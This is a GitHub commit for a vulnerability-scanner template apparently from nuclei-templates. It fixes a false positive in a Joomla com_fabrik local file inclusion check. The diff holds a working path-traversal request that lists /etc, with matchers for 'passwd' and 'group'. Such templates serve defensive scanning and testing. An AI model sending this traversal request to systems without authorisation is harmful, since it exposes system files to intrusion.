Merge pull request #7711 from daffainfo/patch-4

fix: FP joomla-com-fabrik-lfi.yaml
patch-1
Ritik Chaddha 2023-07-26 11:14:00 +05:30 committed by GitHub
commit 8f6ae85e52
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions

View File

@ -18,16 +18,16 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/' - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words:
- '"value":'
- '"disable":false'
- 'text'
part: body part: body
words:
- '"value":"passwd"'
- '"value":"group"'
- '"disable":false'
condition: and condition: and
- type: status - type: status